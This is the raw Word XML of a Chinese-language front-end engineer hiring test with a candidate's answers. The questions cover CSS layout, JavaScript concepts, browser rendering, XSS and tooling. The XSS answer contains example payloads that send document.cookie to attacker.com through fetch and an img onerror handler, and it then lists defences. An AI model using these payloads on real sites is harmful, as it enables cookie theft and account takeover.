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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mttqizxzyvmu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三宏科技股份有限公司</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5stl54jc88dt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2023 前端工程師徵才筆試</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vij4swxyxyz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請全程由應徵者本人完成以下題目，將答案填入題目下方的方框內（字數不限）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答題時可透過任何方式查閱資料，但最終請寫下自己的理解或經驗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題目有任何疑問可使用文件註解功能詢問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填答完成後請來信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d9ead3" w:val="clear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shd w:fill="d9ead3" w:val="clear"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">hr@trident-tech.com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以進行後續流程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Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
          <w:color w:val="999999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color w:val="999999"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">所有人的答案卷都是獨立的，填寫途中如果有看到其他人的游標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Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
          <w:color w:val="999999"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:cs="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun"/>
          <w:color w:val="999999"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">那大概是我們的考官無聊來逛逛，請不要緊張 ：）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sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">開始囉！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:ind w:firstLine="72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Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="4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Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h6igke83g39v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 &amp; CSS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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請依據設計稿轉成網頁，並將結果以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CodeSandbox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或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 連結方式貼於下方答案欄位。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014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需求如下：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設計稿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可使用任意的 HTML / CSS / JavaScript Framework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Logo 僅限使用 CSS 撰寫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需有 RWD，breakpoint 可以自行設定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選單的選項要能被選擇，需做出 selected 的效果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漢堡選單按鈕只在 mobile 版顯示，預設折疊，並且能折疊/展開選單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(optional) 可以此設計為基礎，額外添加自己的設計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連結請貼於此：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https://codesandbox.io/p/github/YuanShuoHsu/trident/master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https://t398p8-3000.csb.app/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before="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Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8rgsc6zh8xt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JavaScript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="34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5731200" cy="864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4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有一段 API 回應如上圖。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請寫出一段程式，找出 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:shd w:fill="d9ead3" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">airportId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city，並印出它的 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:shd w:fill="d9ead3" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cityName</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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let cityName;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for (const cityInfo of API.response.data)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for (const airportInfo of cityInfo.airports)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if (airportInfo.airportId === "TPE")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cityName = cityInfo.cityName;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console.log(cityName);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:spacing w:before="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什麼是 arrow function ？它對 this 有什麼影響？請寫下自己的理解。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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在物件方法中，要存取物件本身可以用 this，this 的預設綁定：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 嚴格模式，this 預設是 undefined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2. 非嚴格模式，瀏覽器的 this 預設是 window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3. 非嚴格模式，node.js 的 this 預設是 global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要綁定 this 的物件對象可以用三種方法：bind()、call()、apply()。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person1 =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name: "Trident",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greeting: function (name1, name2)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console.log(`Hello, ${name1}, ${name2}. I'm ${this.name}.`);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const person2 = { name: "許元碩", };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boundGreeting = person1.greeting.bind(person2, "HTML", "CSS");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boundGreeting(); // Hello, HTML, CSS. I'm 許元碩.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person1.greeting.call(person2, "HTML", "CSS"); // Hello, HTML, CSS. I'm 許元碩.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person1.greeting.apply(person2, ["HTML", "CSS"]); // Hello, HTML, CSS. I'm 許元碩.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箭頭函數 (arrow function) 有兩個重要的特性：更短的函數寫法與 this 變數的非綁定。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 省略 function 關鍵字，並且在某些情況下省略了中、大括號和 return 關鍵字。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function greeting()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return "Hello, Trident";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console.log(greeting()); // Hello, Trident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A. 省略中括號</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    a. 沒有參數時，需要使用中括號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b. 只有一個參數時，可以不使用中括號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c. 兩個以上參數時，需要使用中括號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B. 省略大括號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C. 省略 return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greeting = name =&gt; `Hello, ${name}`;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console.log(greeting("Trident")); // Hello, Trident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2. 箭頭函數當中的 this 綁定的是定義時的對象，而不是使用時的對象，消除 this 執行上下文混淆的問題。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person =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name: 'Trident',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greeting: function()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console.log(`Hello, ${this.name}`);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greetingArrow: () =&gt;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console.log(`Hello, ${this.name}`);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person.greeting(); // Hello, Trident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person.greetingArrow(); // Hello, undefined</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:spacing w:before="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call by value 與 call by reference 的差別是什麼？請寫下自己的理解。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4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 JavaScript 中，資料型別 (data type) 主要分為兩大類：原始型別 (Primitive)、物件型別 (Object)。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原始型別有七種：String、Number、Boolean、Undefined、Null、Symbol、BigInt。原始型別以外的都稱作物件型別：array、function、map……。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原始型別是 call by value，而物件型別是 call by reference。我通常會用 typeof、instanceof 運算符去確認數據類型。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複製物件型別時，為了避免 call by reference 影響原始數據的問題，有兩種處理方式：淺拷貝 (Shallow Copy)、深拷貝 (Deep Copy)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淺拷貝：使用 Object.assign() 或是擴展運算符。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response = { name: "Trident" };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copyResponse1 = Object.assign({}, response);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copyResponse2 = { ...response };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copyResponse1.name = "許元碩";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copyResponse2.name = "許元碩";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console.log(response.name); // Trident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console.log(copyResponse1.name); // 許元碩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console.log(copyResponse2.name); // 許元碩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但淺拷貝只能複製第一層，若多層以上的資料還是會有 call by reference 的問題，因此可以使用深拷貝來處理多層結構的複製。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深拷貝：使用 JSON.parse()、JSON.stringify()。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response = { name: "Trident", data: { score: [80, 90, 100] } };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copyResponse = JSON.parse(JSON.stringify(response)); copyResponse.data.score.push(200);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console.log(response.data.score); // [80, 90, 100] console.log(copyResponse.data.score); // [80, 90, 100, 200]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處理 Ajax 請求時，取決於資料的結構，我通常會使用擴充運算符號（淺拷貝）或 JSON.parse() 和JSON.stringify()（深拷貝）來處理響應的資料。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:before="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什麼是 async / await ？請寫下自己的理解。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5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 JavaScript 中，程式碼預設是同步，從上到下逐行執行，這樣的方式可能會導致阻塞，在處理大量耗時的操作時，會導致應用程式無法執行其他任務。因此 JavaScript 引入回調函數來處理非同步操作。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function fetchData(callback)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setTimeout(function()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callback("已獲取資料");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}, 1000);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fetchData(function(data)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console.log(data);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然而在處理多層嵌套的回調函數時，程式碼結構會變得複雜、難以維護，形成回調地獄。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fetchData(function(data)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console.log(data);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fetchData(function(data2)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console.log(data2);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fetchData(function(data3)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    console.log(data3);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為解決回調地獄的問題，可以使用 Promise。Promise 有三種狀態：進行中、已解決（成功）、已拒絕（失敗）。可以使用 .then() 方法鍊式來處理成功狀態，以及 .catch() 處理失敗狀態。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function fetchData()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return new Promise(function(resolve, reject)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setTimeout(function()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    resolve("已獲取資料");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}, 1000);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fetchData()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.then(function(data)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console.log(data);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 .catch(function(error)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console.error(error);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async / await 則是構建在 Promise 之上的語法糖，使非同步更容易理解。async 用於標記一個函數為非同步函數，await 用於等待一個 Promise 的解決。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async function fetchData()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const data = await new Promise(function(resolve, reject)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setTimeout(function()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        resolve("已獲取資料");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    }, 1000);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console.log(data);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 catch (error)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console.error(error);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fetchData();</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:spacing w:before="6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什麼是 Closure (閉包)？請寫下自己的理解，並舉一個應用的例子。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6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內部函數可以訪問外部函數的參數值，通常會用來做加減法器，個人覺得像悠遊卡儲值。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function createCounter()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let count = 0;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function increment() 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count++;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console.log(count);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function decrement()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count--;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console.log(count);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function reset()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count = 0;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console.log(count);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return { increment, decrement, reset };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const counter = createCounter();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counter.increment(); // 1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counter.increment(); // 2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counter.decrement(); // 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counter.reset(); // 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:spacing w:before="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什麼是 AJAX ？他的使用時機為何？請寫下自己的理解。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7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 2006 年到 2012 年之間，Google 積極開發 AJAX 技術，實現不跳轉頁面進行網路請求，使得網頁不需要在每次互動時，重新載入整個頁面。因為 AJAX 技術的提升，網頁從早期傳統的多頁面應用程式 (MPA) 發展成單頁面應用程式 (SPA) 。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在 2012 年到 2016 年之間，形成現今三大主流框架 React、Vue、Angular，組件化開發將資料轉為視圖，形成前後端分離的形式，UI / UX、前端工程師、後端工程師三種職務進行分工。然而 SPA 在客戶端渲染 (CSR)，搜尋引擎爬蟲會認為網頁是空洞的，無法正確索引內容，導致搜尋引擎優化 (SEO) 的問題。為了解決這個問題，Vercel 這家公司採用伺服器端渲染 (SSR) 和靜態網站產生 (SSG) 技術，推出 Next.js 和 Nuxt.js 這兩個框架，透過伺服器端產生 HTML 頁面，提高了 SPA 的 SEO 性能。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一般常見的請求有四種：XHR、jQuery、Axios、Fetch API。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var xhttp = new XMLHttpRequest();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xhttp.onreadystatechange = function()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if (this.readyState == 4 &amp;&amp; this.status == 200) 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document.getElementById("demo").innerHTML = xhttp.responseText;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xhttp.open("GET", "filename", true);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xhttp.send();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由於 XHR 使用起來麻煩，實務上很少直接使用原生 XMLHttpRequest，而去使用 jQuery、Axios、Fetch API。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jQuery、Axios 都是經由 XHR 進行封裝網頁兼容度好。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jQuery 較為笨重，在輕量化框架中通常不考慮使用。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Fetch API 是網頁原生封裝，是未來的趨勢，它的出現就是來取代 XHR 的，目前在 Can I use 上的支援度在 96%，如果不需考慮舊版本瀏覽器可以直接使用，在這之前通常使用 Axios 去撰寫程式碼。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Axios、Fetch API 都是 Promise風格，Axios只有一層 Pomise，而 Fetch API 有兩層 Promise。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axios.get('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https://example.com/api/data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.then(response =&gt;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// 處理響應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.catch(error =&gt;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// 處理錯誤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fetch('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https://example.com/api/data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.then(response =&gt;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if (!response.ok) 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    throw new Error('網路響應不正確');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return response.json(); // 處理響應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.then(data =&gt; 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// 處理響應數據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.catch(error =&gt;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        // 處理錯誤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});</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:spacing w:before="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rFonts w:ascii="Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_af5m18o7yzi" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:cs="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">效能與安全性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">
      <w:pPr>
        <w:spacing w:before="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請解釋 Browser rendering 中 layout、painting、compositing 分別在做什麼？會如何影響效能？該如何避免？請寫下自己的理解。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8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 瀏覽器工作的完整流程：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導航 (Navigation)、DNS 查詢、TCP 握手、TLS 協商、響應 (Response)、TCP 擁塞控制 (Congestion control)、解析 (Parsing)、建構 DOM 樹、預加載掃描器 (Preload scanner)、建構 CSSOM 樹、JavaScript 編譯、建構輔助功能樹 (Accessibility tree)、渲染 (Render) 包含（樣式 (Style)、佈局 (Layout)、繪製 (Paint)）、合成 (Compositing)、交互 (Interactivity)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RAIL (Response, Animate, Idle, Load)：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是 Google 團隊提出的性能模型，用於提升瀏覽器內的用戶體驗和性能，頁面初始的載入順序：Load (1s)、Idle (50ms)、Animate (16ms)、Response (100s)。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多數螢幕畫面的更新率是 60Hz，要有良好的畫面呈現須將 Animate 每幀控制在 16ms (1000 / 60)，每個 frame 瀏覽器會依序執行下列動作：JavaScript、Style、Layout、Paint、Composite。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佈局 (Layout)：計算元素佔據空間和位置。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繪製 (Paint)：填充內容，一像素一像素去填充。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合成 (Composite)：多個 layer 依照層級合成在一起。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https://csstriggers.com/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每種 CSS 屬性依據其特性，會觸發不同的動作。而渲染的佈局 (layout) 和繪製 (paint) 的步驟被觸發，會導致回流 (Reflow) 和重繪 (Repaint) 影響瀏覽器性能。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可透過一些技巧使用合成 (compositing)，來避免回流 (Reflow) 和重繪 (Repaint)。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 使用 transform 來移動調整元素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2. 使用 opacity 來改變元素能見度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3. 如需頻繁回流或重繪節點，可以透過 will-change 設定成獨立的圖層，可以避免該節點渲染行為影響到其他節點。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請說明 XSS 攻擊如何進行？該如何防禦？請寫下自己的理解。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9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跨站指令攻擊(Cross-site Script)，原本縮寫應該是 CSS，和 CSS 樣式表相仿，調整縮寫為 XSS，透過網頁開發留下的漏洞，注入惡意程式碼到網頁，讓使用者受到影響。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XSS 攻擊主要分為三種類型：儲存型 (Stored XSS)、反射型 (Reflected XSS)、DOM 型 (DOM-based XSS)。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儲存型 (Stored XSS)：攻擊者將惡意腳本儲存在目標網站的伺服器上。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   fetch('https://attacker.com/steal?cookie=' + document.cookie);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反射型 (Reflected XSS)：攻擊者將惡意腳本嵌入 URL 或 HTTP 請求。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http://example.com/search?query=&lt;script&gt;alert('XSS')&lt;/script&gt;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DOM 型 (DOM-based XSS)：透過修改網頁 DOM 內容，從使用者端獲取 DOM 中的數據。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http://example.com/page#&lt;img src='x' onerror='fetch("https://attacker.com/steal?cookie=" + document.cookie)'&gt;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防禦方式主要分為三種：輸入驗證、輸出轉譯、使用 HttpOnlyCookie。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1. 輸入驗證：對用戶輸入的數據進行嚴格驗證，防止攻擊者在表單元件插入惡意腳本。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2. 輸出轉譯：將用戶輸入的數據進行 HTML 或 JavaScript 的轉義處理，防止惡意腳本執行。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3. 使用 HttpOnlyCookie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設置 cookie 時使用 HttpOnly，瀏覽器向伺服器發請求時就會帶 cookie，防止 JavaScript 訪問 document.cookie 取得 cookie。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rFonts w:ascii="Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y0694qh10m8j" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:cs="SimSun" w:eastAsia="SimSun" w:hAnsi="SimSun"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">開發經驗及其他</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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平常使用什麼編輯器與瀏覽器？還有哪些輔助開發的工具？</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table10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前端開發：HTML、CSS、JavaScript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React 框架：Create React App、React Router、Redux、Redux Toolkit、Vite、Next.js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Vue 框架：Vue CLI、Vue Router、Pinia、Vite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後端開發：Node.js、Express、Postman、MongoDB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CSS 框架：Material UI、Ant Design、Bootstrap、Tailwind CSS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相關技術：RWD、Sass/SCSS、CSS Modules、BEM、styled-components、RESTful API、TypeScript、WebSocket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單元測試：Jest、React Testing Library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版本控管：Git、Git Flow、Firebase、Vercel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開發套件：Chart.js、Font Awesome、Google Fonts、i18next、Leaflet 、Swiper、Three.js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開發環境：Visual Studio Code、NVM、NPM、Prettier、ESLint、Lighthouse、Google、Safari</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015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請寫下你使用版本控制系統的經驗。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table11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Git 基本操作：初始化 (Init)、檢查版本狀態 (Status)、加入版本控制 (Add)、提交 (Commit)、查看版本紀錄 (Log)、克隆 (Clone)、創建分支 (Branch)、切換分支 (Checkout)、合併分支 (Merge)、推送 (Push)、拉取 (Pull)...等操作。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Git Flow 工作流程：建立主分支 (main 或 master)、開發分支 (develop)、特性分支 (feature)、發布分支 (release)、熱修復分支 (hotfix) 等分支，來管理程式碼的開發和發布。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完成分支開發後，創建 Pull Request，其他團隊成員代碼審查 (Code Review) 並進行評論 (Comment)，符合要求後合併 (Merge) 到目標分支中。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015C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使用過哪些 web 相關的 framework？對於開發時使用 framework 有什麼想法？</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table12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使用過的框架可參照 9.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整體取決於項目的需求和團隊的背景，學習曲線、生態系、性能、擴展性和可維護性等。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React 主要由 Render Props 和 HOC 構成，學習曲線平穩，較沒有版本迭代問題，版本 16 後，底層機制改成 React Fiber 提升效能，官方技術規範統一，React Router、TypeScript、Redux、Jest、React Testing Library，是目前最主流的前端開發框架，項目由 JSX 模板撰寫，單向數據流減少混亂，適合大型專案開發，可維護性極高。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Vue 學習曲線較為陡峭，尤其 Vue2、Vue3 迭代嚴重，項目基本只能重構，Object.defineProperty() / Proxy、Options API / Compostion API、Vue CLI / Vite、Vetur / Volar、Vuex / Pinia。華語生態系資源豐富，語法糖使用非常方便，尤其是雙向數據綁定的功能，底層機制徹底解決 React JSX 模板語法遍歷問題，但官方沒有統一技術規範，須由資深工程師內部自行討論奠定，可維護性較差，Code Style 因人而異，可快速起架專案，適合小項目開發。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000016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是否有做過 Unit Test 或 E2E Test？若有請分享你使用的工具及經驗。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table13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單元測試：Jest、React Testing Library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端對端測試：Selenium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Jest 是一個廣泛使用的 JavaScript 單元測試框架，而 React Testing Library 是用於協助 React 的測試工具，在最新版 Create React App 中會內建配置兩者，通常我會搭配一起使用。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Selenium 是一個用於自動化瀏覽器測試的工具，早期在撰寫 Python 時，會使用它來控制瀏覽器行為，來模擬使用者操作。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覺得這份試題的難度如何？有什麼想對出題者說的話嗎？</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table14"/>
        <w:tblW w:w="8640.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="720.0" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:color="666666" w:space="0" w:sz="12" w:val="single"/>
          <w:left w:color="666666" w:space="0" w:sz="12" w:val="single"/>
          <w:bottom w:color="666666" w:space="0" w:sz="12" w:val="single"/>
          <w:right w:color="666666" w:space="0" w:sz="12" w:val="single"/>
          <w:insideH w:color="666666" w:space="0" w:sz="12" w:val="single"/>
          <w:insideV w:color="666666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整體難度偏易，但內容豐富需花較多時間作答。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 &amp; CSS：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可以規範符合公司的技術指標撰寫，釐清未來專案需求。像是 CSS framework、JavaScript Framework，沒有特別說明時，我的理解會偏向撰寫原生程式碼，以檢測前端工程師刻板的基本能力，整體會偏向個人代碼風格。有 UI / UX 工程師處理 Figma 挺好的，但部分設計不太美觀我有做些微調。另外，hamburgur icon 命名好像錯了，應該是 hamburger icon？個人覺得 Sidebar 可以分成兩個組件 Header、Sidebar，未來業務邏輯變更複雜時，RWD 才不會混亂難以維護，當然各有優缺點，所以我這邊還是根據題意去撰寫。白頭翁的 Logo 蠻有趣的，幾何圖形設計想了一下。</w:t>
              <w:br w:type="textWrapping"/>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">JavaScript：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題目出得很好，很有邏輯與漸進性，可以複習 ES6 的知識點。但後面不小心越寫越多概念一直延伸，如能放在面試過程中作答，會更有鑑別度，人力考量需求可以嘗試。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效能與安全性：</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">與上述 JavaScript 題目感受相同。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開發經驗及其他：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能感受出是注重團隊協作的技術範疇。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firstLine="72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nsola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398p8-3000.csb.app/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://codesandbox.io/p/github/YuanShuoHsu/trident/master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figma.com/file/OtXrcuXF11jaD81p7k3BrO/%E7%AD%86%E8%A9%A6%E9%A1%8C-Public" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:hr@trident-tech.com" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://codesandbox.io/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://codepen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